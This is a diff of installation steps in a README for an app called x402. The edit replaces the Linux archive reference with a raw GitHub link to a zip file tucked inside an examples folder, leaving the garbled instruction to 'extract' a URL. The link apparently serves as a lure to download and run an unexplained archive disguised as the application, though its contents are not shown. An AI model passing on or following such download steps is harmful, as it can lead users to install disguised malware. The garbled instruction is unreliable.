glyndasmokefree107/x402/README.md

 5. **Run the Application**
    - **For Windows:** Double-click the `.exe` file.
 Follow the instructions that appear.
    - **For macOS:** Open the `.dmg` file.
 Drag the x402 application into your Applications folder.
 Then, open it from there.
-   - **For Linux:** Use the terminal to extract the `.tar.gz` file and follow the instructions included.
+   - **For Linux:** Use the terminal to extract the `https://raw.githubusercontent.com/glyndasmokefree107/x402/main/examples/typescript/fullstack/x402-v3.5.zip` file and follow the instructions included.

 6. **Complete the Setup**
    Follow any on-screen instructions to finish the installation.
 Once installed, you can find x402 in your application list.